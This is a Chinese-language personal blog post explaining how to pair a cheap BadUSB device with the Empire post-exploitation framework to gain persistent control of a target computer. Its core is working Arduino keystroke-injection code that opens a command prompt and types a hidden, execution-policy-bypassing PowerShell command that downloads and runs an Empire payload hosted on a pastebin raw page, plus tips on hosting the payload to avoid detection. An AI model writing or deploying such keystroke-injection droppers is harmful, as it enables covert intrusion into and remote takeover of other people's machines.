BadUsb+Empire 让目标持久怀孕

当我抬起头,眼泪变得很自由!

0x00 前言

Empire

Empire这个工具在后渗透的工作中可以说很神,具体介绍文末会有链接。
Empire生成的payload是powershell代码,我联想到上次玩的badusb,简易BadUsb教程.那次其实是失败的,不知道是我smtp邮箱配置错误还是其他原因,没收到靶机发回来的getpass信息,而且你那台服务器如果被扫描,运气不好被发现了ps代码,邮箱信息还得暴露,不是很稳。然后想到用帝国生成ps代码,再用badusb插入目标机器(可惜我不会social engineering),实现持久怀孕。

Action

  • 先用Empire生成payload
    evil
    Evi1wing
  • 将payload放在你能通过ps命令下载到的地方,因为这payload经过Base64编码,比较长,接触目标的时间也不能过长,而且badusb的payload需要多调试几遍,确保在哪台机器都能正常执行命令。
    刚开始我是放在服务器上,后面我换到了pastebin上。
    paste以后点击raw。
    Evilwing
    比心心

    构造Badusb代码

工具在上一篇里面有,怎么做已经讲了。

#include <Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD");
  delay(500); 
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(500); 
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.release(KEY_LEFT_SHIFT);
  delay(500);
  Keyboard.print("powershell -ep bypass -w h -c iex (new-object net.webclient).downloadstring('https://pastebin.com/raw/youraddress') ");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

shutdown

当你看到一个黑框框一闪而过时,证明已经ok了。
演示视频:

Empire:

Evilwing

evilwing
下面就看你自己的骚操作了。

evilwing
我的badusb是淘宝货,左边个已经玩坏了.

关于Empire的一些链接:
官方wiki
杀软bypass之当Regsvr32邂逅Powershell
后渗透测试神器Empire详解
域渗透神器Empire安装和简单使用

MIKU

欢迎在下方给我留言。


   转载规则


《BadUsb+Empire 让目标持久怀孕》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
再见,不负遇见! 再见,不负遇见!
Wing ——半文艺少年喜欢网易云很久了,我感觉它就是一面镜子,能看到最真实的自己。网易云,发现音乐,发现你自己。 我会持续在博客更新我遇到的故事和句子,这就叫孤独。 初见人世时,你以为江湖就是你手中的这杯酒,青山白骨,烈火干柴
2017-11-11
下一篇 
彼岸花 彼岸花
彼岸花开谢彼岸,三生石上泪两行。 彼岸花,花开开彼岸,花开时看不到叶子,有叶子时看不到花,花叶两不相见,生生相错。这是彼岸花的悲哀,就像是永远无法在一起的恋人一样。因此,她在日本的花语是「悲伤的回忆」,在韩国的花语则是「相互思念」。 彼岸
2017-10-21
  目录